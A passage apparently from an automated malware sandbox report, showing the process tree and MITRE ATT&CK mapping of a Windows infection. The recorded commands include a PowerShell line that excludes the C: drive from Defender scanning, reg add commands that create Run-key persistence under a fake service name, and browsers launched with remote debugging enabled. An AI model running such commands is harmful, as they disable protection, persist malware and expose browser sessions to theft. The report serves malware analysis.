        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4288 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:2744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3744,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1868 /prefetch:2
        8⤵
        
        PID:6536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:7112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b0,0x7ff90eaff208,0x7ff90eaff214,0x7ff90eaff220
        8⤵
        
        PID:6184
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
        8⤵
        
        PID:6464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3
        8⤵
        
        PID:6460
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8
        8⤵
        
        PID:6520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=2624,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=2636 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=3948 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:4904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3880,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=4144 /prefetch:8
        8⤵
        
        PID:5820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:3004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ff915f4f208,0x7ff915f4f214,0x7ff915f4f220
        8⤵
        
        PID:5664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1892,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:3
        8⤵
        
        PID:6668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2592,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:2
        8⤵
        
        PID:6216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1836,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:8
        8⤵
        
        PID:6612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3372,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=3408 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3392,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4076,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4084,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3556,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:8
        8⤵
        
        PID:6720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
        8⤵
        
        PID:2780
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
        8⤵
        
        PID:6248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4964,i,16302298809924902752,9166583550091400488,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8
        8⤵
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\10319050101\86a84bfafd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319050101\86a84bfafd.exe"
        6⤵
        
        PID:5504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5380
      - C:\Users\Admin\AppData\Local\Temp\10319060101\Jq0hGDZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319060101\Jq0hGDZ.exe"
        6⤵
        
        PID:5828
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        7⤵
        Modifies registry key
        
        PID:5600
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 9011" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10319060101\Jq0hGDZ.exe\" /f
        7⤵
        Modifies registry key
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 9011" /t REG_BINARY /d 020000000000000000000000 /f
        7⤵
        Modifies registry key
        
        PID:3188
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 9011" /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:4568
      - C:\Users\Admin\AppData\Local\Temp\10319070101\cUpXaxB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319070101\cUpXaxB.exe"
        6⤵
        
        PID:5208
      - C:\Users\Admin\AppData\Local\Temp\10319080101\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319080101\zx4PJh6.exe"
        6⤵
        
        PID:5404
      - C:\Users\Admin\AppData\Local\Temp\10319090101\tK0oYx3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319090101\tK0oYx3.exe"
        6⤵
        
        PID:6404
      - C:\Users\Admin\AppData\Local\Temp\10319100101\y0u3d_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319100101\y0u3d_003.exe"
        6⤵
        
        PID:5136
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:5252
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:5644
      - C:\Users\Admin\AppData\Local\Temp\10319110101\OkH8IPF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319110101\OkH8IPF.exe"
        6⤵
        
        PID:5492
      - C:\Users\Admin\AppData\Local\Temp\10319130101\QL4t9UZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319130101\QL4t9UZ.exe"
        6⤵
        
        PID:1224
      - C:\Users\Admin\AppData\Local\Temp\10319140101\479eb71835.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319140101\479eb71835.exe"
        6⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319140101\479eb71835.exe"
        7⤵
        
        PID:6692
      - C:\Users\Admin\AppData\Local\Temp\10319150101\fd909223c6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319150101\fd909223c6.exe"
        6⤵
        
        PID:5252

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4920

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:2864

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2000

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6488

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion